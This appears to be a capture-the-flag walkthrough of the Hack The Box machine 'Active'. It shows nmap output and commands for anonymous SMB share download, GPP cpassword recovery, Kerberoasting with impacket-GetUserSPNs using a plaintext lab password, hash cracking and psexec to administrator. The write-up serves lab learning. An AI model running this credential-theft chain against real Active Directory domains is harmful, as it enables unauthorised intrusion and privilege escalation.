Active (Easy)

Enumeration

Nmap

nmap -sC -sV -oA nmap/10.10.10.100 10.10.10.100

Nmap scan report for 10.10.10.100
Host is up (0.13s latency).
Not shown: 983 closed ports
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Microsoft DNS 6.1.7601 (1DB15D39) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15D39)
88/tcp    open  tcpwrapped
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: active.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
49152/tcp open  msrpc         Microsoft Windows RPC
49153/tcp open  msrpc         Microsoft Windows RPC
49154/tcp open  msrpc         Microsoft Windows RPC
49155/tcp open  msrpc         Microsoft Windows RPC
49157/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49158/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2.02: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2021-07-07T15:01:24
|_  start_date: 2021-07-07T05:25:16

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Jul  7 11:01:33 2021 -- 1 IP address (1 host up) scanned in 89.52 seconds

We first can go to SMB enumeration.

SMB

As we can see, we can anonymous login to the machine's SMB

For the Users directory, it seems like we can't access.

We can see there is a directory called active.htb and inside the directory has multiple of files.

We can use a command called smbget to download all the files inside.

smbget -R smb://10.10.10.100/Replication

Inside the directory, there is a file called Groups.xml

We can see that user name is active.htb\SVC_TGS and c_password.

After googling, we can decrypt c_password using this github repository

We then can use the username and password to log in to the Users shared folder of the SMB

User

Privilege Escalation

Get-UserSPN

We can use getUserSPN to get administrator SPN ticket

impacket-GetUserSPNs active.htb/SVC_TGS:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request

We then can save this ticket to a file and let John-The-Ripper to crack the hash

We then get a password.

We then can use psexec to get administrator login

Got ROOT!